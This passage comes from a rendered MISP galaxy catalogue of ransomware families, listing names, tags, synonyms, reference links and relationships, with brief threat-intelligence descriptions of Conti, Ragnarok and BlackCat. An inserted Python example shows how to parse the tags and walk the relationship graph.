The tag is: misp-galaxy:ransomware="Snake-Ekans"

SnakeLocker

ransomware

The tag is: misp-galaxy:ransomware="SnakeLocker"

Snatch

ransomware

The tag is: misp-galaxy:ransomware="Snatch"

SnowPicnic

ransomware

The tag is: misp-galaxy:ransomware="SnowPicnic"

SoFucked

ransomware

The tag is: misp-galaxy:ransomware="SoFucked"

SOLO

ransomware

The tag is: misp-galaxy:ransomware="SOLO"

Somik1

ransomware

The tag is: misp-galaxy:ransomware="Somik1"

Sorry HT

ransomware

The tag is: misp-galaxy:ransomware="Sorry HT"

SpartCrypt

ransomware

The tag is: misp-galaxy:ransomware="SpartCrypt"

Spectre

ransomware

The tag is: misp-galaxy:ransomware="Spectre"

Sphinx

ransomware

The tag is: misp-galaxy:ransomware="Sphinx"

Spiteful Doubletake

ransomware

The tag is: misp-galaxy:ransomware="Spiteful Doubletake"

SpongeBob

ransomware

The tag is: misp-galaxy:ransomware="SpongeBob"

StalinLocker

ransomware

The tag is: misp-galaxy:ransomware="StalinLocker"

Stinger

ransomware

The tag is: misp-galaxy:ransomware="Stinger"

Storm

ransomware

The tag is: misp-galaxy:ransomware="Storm"

StrawHat

ransomware

The tag is: misp-galaxy:ransomware="StrawHat"

Streamer

ransomware

The tag is: misp-galaxy:ransomware="Streamer"

Striked

ransomware

The tag is: misp-galaxy:ransomware="Striked"

Stroman

ransomware

The tag is: misp-galaxy:ransomware="Stroman"

Stupid

ransomware

The tag is: misp-galaxy:ransomware="Stupid"

StupidJapan

ransomware

The tag is: misp-galaxy:ransomware="StupidJapan"

Styver

ransomware

The tag is: misp-galaxy:ransomware="Styver"

Styx

ransomware

The tag is: misp-galaxy:ransomware="Styx"

SuperB

ransomware

The tag is: misp-galaxy:ransomware="SuperB"

SuperCrypt

ransomware

The tag is: misp-galaxy:ransomware="SuperCrypt"

Suri

ransomware

The tag is: misp-galaxy:ransomware="Suri"

Symbiom

ransomware

The tag is: misp-galaxy:ransomware="Symbiom"

SymmyWare

ransomware

The tag is: misp-galaxy:ransomware="SymmyWare"

Syrk

ransomware

The tag is: misp-galaxy:ransomware="Syrk"

SYSDOWN

ransomware

The tag is: misp-galaxy:ransomware="SYSDOWN"

SystemCrypter

ransomware

The tag is: misp-galaxy:ransomware="SystemCrypter"

T1Happy

ransomware

The tag is: misp-galaxy:ransomware="T1Happy"

Takahiro Locker

ransomware

The tag is: misp-galaxy:ransomware="Takahiro Locker"

TBHRanso

ransomware

The tag is: misp-galaxy:ransomware="TBHRanso"

Teamo

ransomware

The tag is: misp-galaxy:ransomware="Teamo"

Tear Dr0p

ransomware

The tag is: misp-galaxy:ransomware="Tear Dr0p"

Technicy

ransomware

The tag is: misp-galaxy:ransomware="Technicy"

TeslaWare

ransomware

The tag is: misp-galaxy:ransomware="TeslaWare"

TFlower

ransomware

The tag is: misp-galaxy:ransomware="TFlower"

The Brotherhood

ransomware

The tag is: misp-galaxy:ransomware="The Brotherhood"

The Magic

ransomware

The tag is: misp-galaxy:ransomware="The Magic"

TheCursedMurderer

ransomware

The tag is: misp-galaxy:ransomware="TheCursedMurderer"

TheDarkEncryptor

ransomware

The tag is: misp-galaxy:ransomware="TheDarkEncryptor"

Thor

ransomware

The tag is: misp-galaxy:ransomware="Thor"

THT

ransomware

The tag is: misp-galaxy:ransomware="THT"

ThunderCrypt

ransomware

The tag is: misp-galaxy:ransomware="ThunderCrypt"

Tk

ransomware

The tag is: misp-galaxy:ransomware="Tk"

Torchwood

ransomware

The tag is: misp-galaxy:ransomware="Torchwood"

TorLocker

ransomware

The tag is: misp-galaxy:ransomware="TorLocker"

TotalWipeOut

ransomware

The tag is: misp-galaxy:ransomware="TotalWipeOut"

TPS1.0

ransomware

The tag is: misp-galaxy:ransomware="TPS1.0"

Trick-Or-Treat

ransomware

The tag is: misp-galaxy:ransomware="Trick-Or-Treat"

Trojan-Syria

ransomware

The tag is: misp-galaxy:ransomware="Trojan-Syria"

TrumpHead

ransomware

The tag is: misp-galaxy:ransomware="TrumpHead"

TurkStatik

ransomware

The tag is: misp-galaxy:ransomware="TurkStatik"

Tyrant

ransomware

The tag is: misp-galaxy:ransomware="Tyrant"

UCCU

ransomware

The tag is: misp-galaxy:ransomware="UCCU"

Ukash

ransomware

The tag is: misp-galaxy:ransomware="Ukash"

Ultimo HT

ransomware

The tag is: misp-galaxy:ransomware="Ultimo HT"

UltraCrypter

ransomware

The tag is: misp-galaxy:ransomware="UltraCrypter"

Unikey

ransomware

The tag is: misp-galaxy:ransomware="Unikey"

Unknown Crypted

ransomware

The tag is: misp-galaxy:ransomware="Unknown Crypted"

Unknown Lock

ransomware

The tag is: misp-galaxy:ransomware="Unknown Lock"

Unknown XTBL

ransomware

The tag is: misp-galaxy:ransomware="Unknown XTBL"

Unlckr

ransomware

The tag is: misp-galaxy:ransomware="Unlckr"

UNNAM3D

ransomware

The tag is: misp-galaxy:ransomware="UNNAM3D"

Unnamed Bin

ransomware

The tag is: misp-galaxy:ransomware="Unnamed Bin"

Unrans

ransomware

The tag is: misp-galaxy:ransomware="Unrans"

UselessDisk

ransomware

The tag is: misp-galaxy:ransomware="UselessDisk"

UselessFiles

ransomware

The tag is: misp-galaxy:ransomware="UselessFiles"

USR0

ransomware

The tag is: misp-galaxy:ransomware="USR0"

Vaca

ransomware

The tag is: misp-galaxy:ransomware="Vaca"

VCrypt

ransomware

The tag is: misp-galaxy:ransomware="VCrypt"

vCrypt1

ransomware

The tag is: misp-galaxy:ransomware="vCrypt1"

VegaLocker

ransomware

The tag is: misp-galaxy:ransomware="VegaLocker"

Velso

ransomware

The tag is: misp-galaxy:ransomware="Velso"

Vendetta

ransomware

The tag is: misp-galaxy:ransomware="Vendetta"

VevoLocker

ransomware

The tag is: misp-galaxy:ransomware="VevoLocker"

VHD

ransomware

The tag is: misp-galaxy:ransomware="VHD"

ViACrypt

ransomware

The tag is: misp-galaxy:ransomware="ViACrypt"

Viagra

ransomware

The tag is: misp-galaxy:ransomware="Viagra"

VideoBelle

ransomware

The tag is: misp-galaxy:ransomware="VideoBelle"

ViiperWare

ransomware

The tag is: misp-galaxy:ransomware="ViiperWare"

Viro

ransomware

The tag is: misp-galaxy:ransomware="Viro"

ViroBotnet

ransomware

The tag is: misp-galaxy:ransomware="ViroBotnet"

VisionCrypt

ransomware

The tag is: misp-galaxy:ransomware="VisionCrypt"

VMola

ransomware

The tag is: misp-galaxy:ransomware="VMola"

VoidCrypt

ransomware

The tag is: misp-galaxy:ransomware="VoidCrypt"

Vulston

ransomware

The tag is: misp-galaxy:ransomware="Vulston"

Waffle

ransomware

The tag is: misp-galaxy:ransomware="Waffle"

Waiting

ransomware

The tag is: misp-galaxy:ransomware="Waiting"

Waldo

ransomware

The tag is: misp-galaxy:ransomware="Waldo"

Wanna Decryptor Portuguese

ransomware

The tag is: misp-galaxy:ransomware="Wanna Decryptor Portuguese"

WannabeHappy

ransomware

The tag is: misp-galaxy:ransomware="WannabeHappy"

WannaCash

ransomware

The tag is: misp-galaxy:ransomware="WannaCash"

WannaDie

ransomware

The tag is: misp-galaxy:ransomware="WannaDie"

WannaPeace

ransomware

The tag is: misp-galaxy:ransomware="WannaPeace"

WannaSpam

ransomware

The tag is: misp-galaxy:ransomware="WannaSpam"

Want Money

ransomware

The tag is: misp-galaxy:ransomware="Want Money"

Wesker

ransomware

The tag is: misp-galaxy:ransomware="Wesker"

WhatAFuck

ransomware

The tag is: misp-galaxy:ransomware="WhatAFuck"

WhyCry

ransomware

The tag is: misp-galaxy:ransomware="WhyCry"

Windows10

ransomware

The tag is: misp-galaxy:ransomware="Windows10"

WininiCrypt

ransomware

The tag is: misp-galaxy:ransomware="WininiCrypt"

Winsecure

ransomware

The tag is: misp-galaxy:ransomware="Winsecure"

WinUpdatesDisabler

ransomware

The tag is: misp-galaxy:ransomware="WinUpdatesDisabler"

WTDI

ransomware

The tag is: misp-galaxy:ransomware="WTDI"

X Locker 5.0

ransomware

The tag is: misp-galaxy:ransomware="X Locker 5.0"

XCry

ransomware

The tag is: misp-galaxy:ransomware="XCry"

XD

ransomware

The tag is: misp-galaxy:ransomware="XD"

XData

ransomware

The tag is: misp-galaxy:ransomware="XData"

XeroWare

ransomware

The tag is: misp-galaxy:ransomware="XeroWare"

Xlockr

ransomware

The tag is: misp-galaxy:ransomware="Xlockr"

XmdXtazX

ransomware

The tag is: misp-galaxy:ransomware="XmdXtazX"

Xncrypt

ransomware

The tag is: misp-galaxy:ransomware="Xncrypt"

XRat

ransomware

The tag is: misp-galaxy:ransomware="XRat"

XRat has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="xRAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="xrat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="XRat" with estimative-language:likelihood-probability="likely"

XyuEncrypt

ransomware

The tag is: misp-galaxy:ransomware="XyuEncrypt"

xXLecXx

ransomware

The tag is: misp-galaxy:ransomware="xXLecXx"

Yatron

ransomware

The tag is: misp-galaxy:ransomware="Yatron"

Yoshikada

ransomware

The tag is: misp-galaxy:ransomware="Yoshikada"

YYYYBJQOQDU

ransomware

The tag is: misp-galaxy:ransomware="YYYYBJQOQDU"

ZariqaCrypt

ransomware

The tag is: misp-galaxy:ransomware="ZariqaCrypt"

Zelta Free

ransomware

The tag is: misp-galaxy:ransomware="Zelta Free"

ZenCrypt

ransomware

The tag is: misp-galaxy:ransomware="ZenCrypt"

Zeoticus

ransomware

The tag is: misp-galaxy:ransomware="Zeoticus"

Zeppelin

ransomware

The tag is: misp-galaxy:ransomware="Zeppelin"

Zero-Fucks

ransomware

The tag is: misp-galaxy:ransomware="Zero-Fucks"

ZeroLocker

ransomware

The tag is: misp-galaxy:ransomware="ZeroLocker"

Zeronine

ransomware

The tag is: misp-galaxy:ransomware="Zeronine"

ZeroRansom

ransomware

The tag is: misp-galaxy:ransomware="ZeroRansom"

Zilla

ransomware

The tag is: misp-galaxy:ransomware="Zilla"

ZimbraCryptor

ransomware

The tag is: misp-galaxy:ransomware="ZimbraCryptor"

ZipLocker

ransomware

The tag is: misp-galaxy:ransomware="ZipLocker"

Zipper

ransomware

The tag is: misp-galaxy:ransomware="Zipper"

Zoldon

ransomware

The tag is: misp-galaxy:ransomware="Zoldon"

ZorgoCry

ransomware

The tag is: misp-galaxy:ransomware="ZorgoCry"

Smaug

ransomware

The tag is: misp-galaxy:ransomware="Smaug"

GammA

ransomware

The tag is: misp-galaxy:ransomware="GammA"

BlackMoon

ransomware

The tag is: misp-galaxy:ransomware="BlackMoon"

MilkmanVictory

ransomware

The tag is: misp-galaxy:ransomware="MilkmanVictory"

Dragoncyber

ransomware

The tag is: misp-galaxy:ransomware="Dragoncyber"

Solider

ransomware

The tag is: misp-galaxy:ransomware="Solider"

Biglock

ransomware

The tag is: misp-galaxy:ransomware="Biglock"

Immuni

ransomware

The tag is: misp-galaxy:ransomware="Immuni"

Black claw

ransomware

The tag is: misp-galaxy:ransomware="Black claw"

Banks1

ransomware

The tag is: misp-galaxy:ransomware="Banks1"

UnluckyWare

ransomware

The tag is: misp-galaxy:ransomware="UnluckyWare"

Zorab

ransomware

The tag is: misp-galaxy:ransomware="Zorab"

FonixCrypter

ransomware

The tag is: misp-galaxy:ransomware="FonixCrypter"

LickyAgent

ransomware

The tag is: misp-galaxy:ransomware="LickyAgent"

DualShot

ransomware

The tag is: misp-galaxy:ransomware="DualShot"

RNS

ransomware

The tag is: misp-galaxy:ransomware="RNS"

Such_Crypt

ransomware

The tag is: misp-galaxy:ransomware="Such_Crypt"

20dfs

ransomware

The tag is: misp-galaxy:ransomware="20dfs"

CryDroid

ransomware

The tag is: misp-galaxy:ransomware="CryDroid"

TomNom

ransomware

The tag is: misp-galaxy:ransomware="TomNom"

Yogynicof

ransomware

The tag is: misp-galaxy:ransomware="Yogynicof"

CobraLocker

ransomware

The tag is: misp-galaxy:ransomware="CobraLocker"

PL

ransomware

The tag is: misp-galaxy:ransomware="PL"

CryCryptor

ransomware

The tag is: misp-galaxy:ransomware="CryCryptor"

Blocky

ransomware

The tag is: misp-galaxy:ransomware="Blocky"

OhNo-FakePDF

ransomware

The tag is: misp-galaxy:ransomware="OhNo-FakePDF"

Try2Cry

ransomware

The tag is: misp-galaxy:ransomware="Try2Cry"

LolKek

ransomware

The tag is: misp-galaxy:ransomware="LolKek"

FlowEncrypt

ransomware

The tag is: misp-galaxy:ransomware="FlowEncrypt"

WhoLocker

ransomware

The tag is: misp-galaxy:ransomware="WhoLocker"

Pojie

ransomware

The tag is: misp-galaxy:ransomware="Pojie"

Aris Locker

ransomware

The tag is: misp-galaxy:ransomware="Aris Locker"

EduRansom

ransomware

The tag is: misp-galaxy:ransomware="EduRansom"

Fastwind

ransomware

The tag is: misp-galaxy:ransomware="Fastwind"

Silvertor

ransomware

The tag is: misp-galaxy:ransomware="Silvertor"

Exorcist

ransomware

The tag is: misp-galaxy:ransomware="Exorcist"

WyvernLocker

ransomware

The tag is: misp-galaxy:ransomware="WyvernLocker"

Ensiko

ransomware

The tag is: misp-galaxy:ransomware="Ensiko"

Django

ransomware

The tag is: misp-galaxy:ransomware="Django"

RansomBlox

ransomware

The tag is: misp-galaxy:ransomware="RansomBlox"

BitRansomware

ransomware

The tag is: misp-galaxy:ransomware="BitRansomware"

AESMew

ransomware

The tag is: misp-galaxy:ransomware="AESMew"

DeathOfShadow

ransomware

The tag is: misp-galaxy:ransomware="DeathOfShadow"

XMRLocker

ransomware

The tag is: misp-galaxy:ransomware="XMRLocker"

WinWord64

ransomware

The tag is: misp-galaxy:ransomware="WinWord64"

ThunderX

ransomware

The tag is: misp-galaxy:ransomware="ThunderX"

Mountlocket

ransomware

The tag is: misp-galaxy:ransomware="Mountlocket"

Mountlocket has relationships with:

  • similar: misp-galaxy:ransomware="QuantumLocker" with estimative-language:likelihood-probability="likely"

Table 8585. Table References

Links

https://howtofix.guide/ransom-mountlocket/

Gladius

ransomware

The tag is: misp-galaxy:ransomware="Gladius"

Cyrat

ransomware

The tag is: misp-galaxy:ransomware="Cyrat"

Crypt32

ransomware

The tag is: misp-galaxy:ransomware="Crypt32"

BizHack

ransomware

The tag is: misp-galaxy:ransomware="BizHack"

Geneve

ransomware

The tag is: misp-galaxy:ransomware="Geneve"

Z3

ransomware

The tag is: misp-galaxy:ransomware="Z3"

Leakthemall

ransomware

The tag is: misp-galaxy:ransomware="Leakthemall"

Conti

Conti ransomware is a RaaS and has been observed encrypting networks since mid-2020. Conti was developed by the “TrickBot” group, an organized Russian cybercriminal operation. Their reputation has allowed the group to create a strong brand name, attracting many affiliates which has made Conti one of the most widespread ransomware strains in the world. One of the last known “Conti” attacks was against the government of Costa Rica in April 2022 causing the country to declare a state of emergency. Shortly after this final attack, the “Conti” brand disappeared. The group behind it likely switched to a different brand to avoid sanctions and start over with a new, clean reputation.

The tag is: misp-galaxy:ransomware="Conti"

Conti has relationships with:

  • parent-of: misp-galaxy:ransomware="QuantumLocker" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:ransomware="BlackBasta" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:ransomware="BlackByte" with estimative-language:likelihood-probability="likely"

Table 8586. Table References

Links

https://www.cyber.gov.au/acsc/view-all-content/advisories/2021-010-acsc-ransomware-profile-conti

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines
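Entries such as Conti, Mountlocket, Nefilim and ProLock above carry relationships ("parent-of", "similar", "dropped-by") qualified with an estimative-language likelihood, and several entries carry synonyms (HelloKitty is also known as FiveHands). The following is an added example, not code from the MISP project or from the galaxy JSON itself, showing how to resolve names and synonyms, build and parse the misp-galaxy tag strings the listing shows, and walk those relationships transitively. The cluster records are constructed to mirror this page's entries and the UUIDs are placeholders, not the real cluster UUIDs.

```python
"""Resolve names and walk relationships in MISP galaxy-style cluster records.

Added example, not code from the MISP project. The records below are constructed
to mirror entries on this page (Conti, QuantumLocker, BlackBasta, BlackByte,
Mountlocket, HelloKitty); the UUIDs are placeholders, not real cluster UUIDs.
"""
import re
from collections import deque

GALAXY_TYPE = "ransomware"
LIKELY = 'estimative-language:likelihood-probability="likely"'


def _u(n):
    # Placeholder UUID for the constructed sample only.
    return f"00000000-0000-4000-8000-{n:012d}"


# Shaped like MISP galaxy cluster entries: value / meta / related (dest-uuid, type, tags).
CLUSTERS = [
    {"uuid": _u(1), "value": "Conti", "meta": {},
     "related": [{"dest-uuid": _u(2), "type": "parent-of", "tags": [LIKELY]},
                 {"dest-uuid": _u(3), "type": "parent-of", "tags": [LIKELY]},
                 {"dest-uuid": _u(4), "type": "parent-of", "tags": [LIKELY]}]},
    {"uuid": _u(2), "value": "QuantumLocker", "meta": {}, "related": []},
    {"uuid": _u(3), "value": "BlackBasta", "meta": {}, "related": []},
    {"uuid": _u(4), "value": "BlackByte", "meta": {}, "related": []},
    {"uuid": _u(5), "value": "Mountlocket", "meta": {},
     "related": [{"dest-uuid": _u(2), "type": "similar", "tags": [LIKELY]}]},
    {"uuid": _u(6), "value": "HelloKitty", "meta": {"synonyms": ["FiveHands"]},
     "related": []},
]

BY_UUID = {c["uuid"]: c for c in CLUSTERS}
# Canonical values and synonyms both resolve to the cluster, case-insensitively.
BY_NAME = {}
for _c in CLUSTERS:
    BY_NAME[_c["value"].lower()] = _c
    for _syn in _c.get("meta", {}).get("synonyms", []):
        BY_NAME[_syn.lower()] = _c

TAG_RE = re.compile(r'^misp-galaxy:([a-z0-9-]+)="(.+)"$')
LIKELIHOOD_RE = re.compile(r'^estimative-language:likelihood-probability="([^"]+)"$')


def cluster_tag(value, galaxy_type=GALAXY_TYPE):
    """The tag string MISP attaches to an event or attribute for this cluster."""
    return f'misp-galaxy:{galaxy_type}="{value}"'


def parse_tag(tag):
    """Split a misp-galaxy tag into (galaxy type, cluster value); None if malformed."""
    m = TAG_RE.match(tag)
    return (m.group(1), m.group(2)) if m else None


def resolve(name):
    """Canonical cluster value for a name or synonym, or None if unknown."""
    c = BY_NAME.get(name.lower())
    return c["value"] if c else None


def _likelihood(rel):
    for t in rel.get("tags", []):
        m = LIKELIHOOD_RE.match(t)
        if m:
            return m.group(1)
    return None


def outbound(name):
    """Relationships the cluster itself declares: {(type, target, likelihood)}."""
    c = BY_NAME[name.lower()]
    return {(r["type"], BY_UUID[r["dest-uuid"]]["value"], _likelihood(r))
            for r in c.get("related", []) if r["dest-uuid"] in BY_UUID}


def inbound(name):
    """Relationships other clusters declare towards this one."""
    target = BY_NAME[name.lower()]["uuid"]
    return {(r["type"], c["value"], _likelihood(r))
            for c in CLUSTERS for r in c.get("related", [])
            if r["dest-uuid"] == target}


def descendants(name, rel_type="parent-of"):
    """Transitive closure over one relationship type (BFS, cycle-safe)."""
    start = resolve(name)
    if start is None:
        return set()
    seen, queue = set(), deque([start])
    while queue:
        for rtype, dest, _ in outbound(queue.popleft()):
            if rtype == rel_type and dest not in seen:
                seen.add(dest)
                queue.append(dest)
    return seen


if __name__ == "__main__":
    for c in CLUSTERS:
        print(cluster_tag(c["value"]), sorted(outbound(c["value"])))
```

Inbound edges matter as much as outbound ones: the rendered listing only shows relationships under the cluster that declares them, so QuantumLocker's own entry would not tell an analyst that both Conti (parent-of) and Mountlocket (similar) point at it. The likelihood qualifier is carried through rather than dropped, since "likely" is an analytic judgement, not an established fact, and should survive into whatever report or pivot the tag ends up in.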

Makop

ransomware

The tag is: misp-galaxy:ransomware="Makop"

Best Crypt

ransomware

The tag is: misp-galaxy:ransomware="Best Crypt"

Consciousness

ransomware

The tag is: misp-galaxy:ransomware="Consciousness"

Flamingo

ransomware

The tag is: misp-galaxy:ransomware="Flamingo"

PewPew

ransomware

The tag is: misp-galaxy:ransomware="PewPew"

DogeCrypt

ransomware

The tag is: misp-galaxy:ransomware="DogeCrypt"

Badbeeteam

ransomware

The tag is: misp-galaxy:ransomware="Badbeeteam"

Solve

ransomware

The tag is: misp-galaxy:ransomware="Solve"

RenameX12

ransomware

The tag is: misp-galaxy:ransomware="RenameX12"

Zhen

ransomware

The tag is: misp-galaxy:ransomware="Zhen"

Datacloud

ransomware

The tag is: misp-galaxy:ransomware="Datacloud"

Ironcat

ransomware

The tag is: misp-galaxy:ransomware="Ironcat"

Dusk

ransomware

The tag is: misp-galaxy:ransomware="Dusk"

Cutekitty

ransomware

The tag is: misp-galaxy:ransomware="Cutekitty"

Babax

ransomware

The tag is: misp-galaxy:ransomware="Babax"

Eyecry

ransomware

The tag is: misp-galaxy:ransomware="Eyecry"

Osno

ransomware

The tag is: misp-galaxy:ransomware="Osno"

Loki

ransomware

The tag is: misp-galaxy:ransomware="Loki"

WoodRat

ransomware

The tag is: misp-galaxy:ransomware="WoodRat"

Curator

ransomware

The tag is: misp-galaxy:ransomware="Curator"

32aa

ransomware

The tag is: misp-galaxy:ransomware="32aa"

Vaggen

ransomware

The tag is: misp-galaxy:ransomware="Vaggen"

Clay

ransomware

The tag is: misp-galaxy:ransomware="Clay"

Pizhon

ransomware

The tag is: misp-galaxy:ransomware="Pizhon"

InstallPay

ransomware

The tag is: misp-galaxy:ransomware="InstallPay"

MetadataBin

ransomware

The tag is: misp-galaxy:ransomware="MetadataBin"

TechandStrat

ransomware

The tag is: misp-galaxy:ransomware="TechandStrat"

Mars

ransomware

The tag is: misp-galaxy:ransomware="Mars"

Scatterbrain

ransomware

The tag is: misp-galaxy:ransomware="Scatterbrain"

CCECrypt

ransomware

The tag is: misp-galaxy:ransomware="CCECrypt"

SZ40

ransomware

The tag is: misp-galaxy:ransomware="SZ40"

Pay2Key

ransomware

The tag is: misp-galaxy:ransomware="Pay2Key"

Tripoli

ransomware

The tag is: misp-galaxy:ransomware="Tripoli"

Devos

ransomware

The tag is: misp-galaxy:ransomware="Devos"

HowAreYou

ransomware

The tag is: misp-galaxy:ransomware="HowAreYou"

SifreCikis

ransomware

The tag is: misp-galaxy:ransomware="SifreCikis"

68-Random-HEX

ransomware

The tag is: misp-galaxy:ransomware="68-Random-HEX"

RedRoman

ransomware

The tag is: misp-galaxy:ransomware="RedRoman"

MXX

ransomware

The tag is: misp-galaxy:ransomware="MXX"

Exerwa CTF

ransomware

The tag is: misp-galaxy:ransomware="Exerwa CTF"

HelloKitty

ransomware

The tag is: misp-galaxy:ransomware="HelloKitty"

HelloKitty is also known as:

  • FiveHands

HolidayCheer

ransomware

The tag is: misp-galaxy:ransomware="HolidayCheer"

Joker Korean

ransomware

The tag is: misp-galaxy:ransomware="Joker Korean"

VenomRAT

ransomware

The tag is: misp-galaxy:ransomware="VenomRAT"

FileEngineering

ransomware

The tag is: misp-galaxy:ransomware="FileEngineering"

LandSlide

ransomware

The tag is: misp-galaxy:ransomware="LandSlide"

Mobef-JustFun

ransomware

The tag is: misp-galaxy:ransomware="Mobef-JustFun"

Mobef-JustFun has relationships with:

  • similar: misp-galaxy:ransomware="Mobef" with estimative-language:likelihood-probability="likely"

Amjixius

ransomware

The tag is: misp-galaxy:ransomware="Amjixius"

Amjixius is also known as:

  • Ancrypted

Table 8587. Table References

Links

https://malware-guide.com/blog/remove-amjixius-ransomware-restore-encrypted-files

DearCry

ransomware

The tag is: misp-galaxy:ransomware="DearCry"

JoJoCrypter

ransomware

The tag is: misp-galaxy:ransomware="JoJoCrypter"

RunExeMemory

ransomware

The tag is: misp-galaxy:ransomware="RunExeMemory"

Pay2Decrypt

ransomware

The tag is: misp-galaxy:ransomware="Pay2Decrypt"

Tortoise

ransomware

The tag is: misp-galaxy:ransomware="Tortoise"

EPICALLY

ransomware

The tag is: misp-galaxy:ransomware="EPICALLY"

Random30

ransomware

The tag is: misp-galaxy:ransomware="Random30"

Hog

ransomware

The tag is: misp-galaxy:ransomware="Hog"

Steel

ransomware

The tag is: misp-galaxy:ransomware="Steel"

JohnBorn

ransomware

The tag is: misp-galaxy:ransomware="JohnBorn"

Egalyty

ransomware

The tag is: misp-galaxy:ransomware="Egalyty"

Namaste

ransomware

The tag is: misp-galaxy:ransomware="Namaste"

HDLocker

ransomware

The tag is: misp-galaxy:ransomware="HDLocker"

Epsilon

ransomware

The tag is: misp-galaxy:ransomware="Epsilon"

DeroHE

ransomware

The tag is: misp-galaxy:ransomware="DeroHE"

Vovalex

ransomware

The tag is: misp-galaxy:ransomware="Vovalex"

Bonsoir

ransomware

The tag is: misp-galaxy:ransomware="Bonsoir"

PulpFictionQuote

ransomware

The tag is: misp-galaxy:ransomware="PulpFictionQuote"

NAS Data Compromiser

ransomware

The tag is: misp-galaxy:ransomware="NAS Data Compromiser"

CNH

ransomware

The tag is: misp-galaxy:ransomware="CNH"

Lucy

ransomware

The tag is: misp-galaxy:ransomware="Lucy"

OCT

ransomware

The tag is: misp-galaxy:ransomware="OCT"

OCT is also known as:

  • OctEncrypt

Pump

ransomware

The tag is: misp-galaxy:ransomware="Pump"

LuciferCrypt

ransomware

The tag is: misp-galaxy:ransomware="LuciferCrypt"

Ziggy

ransomware

The tag is: misp-galaxy:ransomware="Ziggy"

CoderCrypt

ransomware

The tag is: misp-galaxy:ransomware="CoderCrypt"

BlueEagle

ransomware

The tag is: misp-galaxy:ransomware="BlueEagle"

Povisomware

ransomware

The tag is: misp-galaxy:ransomware="Povisomware"

JCrypt

Ransomware written in C#. Fortunately, all current versions of the MafiaWare666 ransomware are decryptable. The Threat Lab from Avast has developed a free decryption tool for this malware.

The tag is: misp-galaxy:ransomware="JCrypt"

JCrypt is also known as:

  • RIP lmao

  • Locked

  • Daddycrypt

  • Omero

  • Crypted

  • Ncovid

  • NotStonks

  • Iam_watching

  • Vn_os

  • Wearefriends

  • MALWAREDEVELOPER

  • MALKI

  • Poison

  • Foxxy

  • Mafiaware666

Table 8588. Table References

Links

https://id-ransomware.blogspot.com/2020/12/jcrypt-ransomware.html

https://twitter.com/kangxiaopao/status/1342027328063295488?lang=en

https://twitter.com/demonslay335/status/1380610583603638277

https://decoded.avast.io/threatresearch/decrypted-mafiaware666-ransomware/

https://files.avast.com/files/decryptor/avast_decryptor_mafiaware666.exe

Uh-Oh

ransomware

The tag is: misp-galaxy:ransomware="Uh-Oh"

Mijnal

ransomware

The tag is: misp-galaxy:ransomware="Mijnal"

16x

The tag is: misp-galaxy:ransomware="16x"

Lockedv1

ransomware

The tag is: misp-galaxy:ransomware="Lockedv1"

XD Locker

ransomware

The tag is: misp-galaxy:ransomware="XD Locker"

Knot

ransomware

The tag is: misp-galaxy:ransomware="Knot"

Parasite

ransomware

The tag is: misp-galaxy:ransomware="Parasite"

Judge

ransomware

The tag is: misp-galaxy:ransomware="Judge"

DEcovid19

ransomware

The tag is: misp-galaxy:ransomware="DEcovid19"

Ragnarok

Ragnarok is a ransomware that targets corporate networks in Big Game Hunting targeted attacks. The ransomware is associated with the 'double-extortion' tactic, stealing and publishing files on a data leak site (DLS).

The tag is: misp-galaxy:ransomware="Ragnarok"

Table 8589. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnaro

https://borncity.com/win/2021/03/27/tu-darmstadt-opfer-der-ragnarok-ransomware/

BlackCat

BlackCat (ALPHV) is ransomware written in Rust. The ransomware makes heavy use of plaintext JSON configuration files to specify the ransomware functionality. BlackCat has many advanced capabilities: it can escalate privileges and bypass UAC, makes use of AES and ChaCha20 or Salsa encryption, may use the Restart Manager, can delete volume shadow copies, can enumerate disk volumes and network shares automatically, and may kill specific processes and services. The ransomware exists for Windows, Linux, and ESXi systems. Multiple extortion techniques are used by the BlackCat gang, such as exfiltrating victim data before the ransomware deployment, threats to release data if the ransom is not paid, and distributed denial-of-service (DDoS) attacks.

The tag is: misp-galaxy:ransomware="BlackCat"

BlackCat is also known as:

  • ALPHV

  • Noberus

BlackCat has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

